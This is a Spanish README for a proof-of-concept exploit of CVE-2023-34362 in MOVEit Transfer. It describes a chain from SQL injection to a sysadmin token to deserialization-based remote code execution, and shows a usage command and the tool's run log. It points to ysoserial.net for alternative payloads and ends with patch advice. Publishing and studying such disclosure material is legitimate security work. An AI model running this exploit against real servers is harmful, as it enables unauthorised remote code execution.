
MOVEit CVE-2023-34362
POC para CVE-2023-34362 que afecta a MOVEit Transfer
Se puede encontrar un análisis técnico de la causa raíz de la vulnerabilidad en nuestro blog: https://www.horizon3.ai/moveit-transfer-cve-2023-34362-deep-dive-and-indicators-of-compromise/
Este POC abusa de una inyección SQL para obtener un token de acceso API de sysadmin y luego usa ese acceso para abusar de una llamada de deserialización y obtener ejecución remota de código.
Este POC necesita conectarse a un endpoint de Identity Provider que aloja certificados RS256 adecuados para falsificar tokens de usuario arbitrarios; por defecto, este POC usa nuestro endpoint IDP alojado en AWS.
Por defecto, el exploit escribirá un archivo en C:\Windows\Temp\message.txt. Se pueden generar payloads alternativos usando el proyecto ysoserial.net.
python CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file
Actualice a la última versión o mitigue siguiendo las instrucciones del Progress Advisory
Este software ha sido creado únicamente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando se haya autorizado explícitamente. Los mantenedores del proyecto no son responsables ni se hacen responsables del mal uso del software. Úselo de manera responsable.